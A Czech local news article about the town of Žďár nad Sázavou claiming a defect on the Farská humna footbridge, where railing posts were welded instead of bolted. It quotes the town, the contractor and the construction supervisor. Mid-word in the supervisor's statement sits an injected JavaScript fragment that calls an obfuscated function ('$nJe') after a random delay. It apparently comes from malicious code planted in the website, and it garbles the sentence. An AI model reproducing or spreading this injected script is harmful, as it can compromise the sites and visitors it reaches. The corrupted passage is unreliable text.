Rainbow page separator

Žďár reklamuje nedostatek na lávce na Farských humnech

Středa, 27. Leden 2021

Město reklamuje lávku na Farských humnech kvůli nedostatku v ukotvení zábradlí, které dodavatel místo přichycení šrouby přivařil. Díry, které byly vyvrtány v době, kdy bylo zábradlí připevněno opačně, po jeho otočení neseděly. Dodavatel díry neupravil tak, aby bylo možné železné profily připevnit šrouby, jak uváděla projektová dokumentace. Firma ujišťuje, že současné provedení je bezpečné.

Město nedostatek reklamovalo a vyžádalo si prodloužení záruky na lávku. Chybu dodavatel napraví do 19. února. Protikorozní nátěr firma nanese, až budou vhodné klimatické podmínky, nejpozději ale do 31. května.

Pod článkem vám přinášíme celá vyjádření města, dodavatele stavby i stavebního dozoru.

Vyjádření města
Lávka na Farských humnech je kvalitně vymyšlený projekt a jsme rádi, že jsme takovou lávku mohli zrealizovat.
Bohužel v rámci záruční doby jsme na podnět občana přišli na závadu v podobě uchycení zábradlí, které není dle projektu. Dodavatel přichytil zábradlí místo šroubů svárem. Současné uchycení je bezpečné, nicméně není esteticky a řemeslně dobře provedené.
Hned druhý den po zjištění proběhla schůzka s dodavatelem a stavebním dozorem. Dodavatel nás ujistil, že do 19. února reklamovanou závadu odstraní s tím, že následný nátěr bude proveden dle klimatických podmínek nejdéle do 31. května. Poté bude ze strany dozoru, dodavatele i města provedena důkladná inspekce celé lávky.
Za chybu převzal zodpovědnost dodavatel a na vlastní náklady ji odstraní. Město bude požadovat v souladu s podepsanou Smlouvou o dílo prodloužení záruky.
„Tento přístup není akceptovatelný. Není to ale věc, která by zkazila celkový dojem, že lávka je pěkná a kvalitně vymyšlená. Bude občanům sloužit po další desítky let a je chloubou města. Žádná podobná lávka tu totiž dlouhá léta nevznikla,“ komentuje starosta Martin Mrkos.
Matěj Papáček, tiskový mluvčí Žďáru nad Sázavou

Vyjádření dodavatele
V samém finále stavby, která patřila stran logistiky i technologického řešení spíše k výzvám, jsme provedli závěrečnou instalaci zábradlí . V této fázi došlo k odchýlení od projektové dokumentace, pročež jsme neprodleně zahájili opravu.
Konstrukce mostovky, do které je konstrukce zábradlí vložena, je tvořena spřaženým ocelobetonovým průřezem. Mostovka se díky tomu dobře adaptuje na různou zátěž a „pohybuje se“. Vlivem tohoto na některým místech nelícují otvory pro vložení šroubů. Tato místa byla řešena svárem a vzniklo tím zábradlí , které odpovídá projektu, je bezpečné a spoje jsou pevné. Na některých místech však nepůsobí otvory nevyplněnými šrouby vizuálně dobře.
Omlouváme se za vzniklou situaci a jsme připraveni ji napravit. Chybějící otvory během následujících 14 dnů dodatečně provrtáme, doplníme šrouby, které tímto spíše než nosnou funkci, splní vizuální doladění celku. Poškozené nátěry můžeme opravit až za vhodného počasí, tedy nejblíže na jaře.
Kateřina Baxová, podniková komunikace PORR a.s.
Vyjádření stavebního dozoru
Při přebírání dokončené lávky chybějící šrouby nebyly zjištěny a nejsou uvedeny ani v seznamu vad a nedodělků. Následně však bylo zjištěno, že dřevěná výplň zábradlí je osazena opačně a výška zábradlí tudíž není dle projektové dokumentace. Zhotoviteli bylo nařízeno vadu odstranit. Za tímto účelem bylo potřeba zábradlí kompletně demontovat a po otočení výplně osadit zpět. Toto provedl subdodavatel zhotovitele, při zpětném osazování sloupků však nesedly otvory pro šrouby přesně na sebe. Pracovníci subdodavatele problém zhotoviteli a TDS neoznámili a vyřešili problém náhradním řešením – menší šrouby, sváry místo šroubů. Pochybením zhotovitele a TDS toto nebylo při přebírání odstraněných vad a nedodělků odhaleno. Subdodavatel si je vědom nestandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardního a nevhodného vyřešení problému a počítá s provedením opravy – doplnění chybějících šroubů, včetně provedení opravy protikorozní ochrany konstrukce. Na zítřejší den 27.1.2020 je svoláno na místě samém samostatné jednání za přítomnosti všech zúčastněných, za účelem stanovení způsobu a termínu provedení opravy. Provedená oprava bude zástupci zhotovitele a TDS převzata a předána zástupci města.
Ing. Radek Soška, STAVONA Tender, spol. s r.o.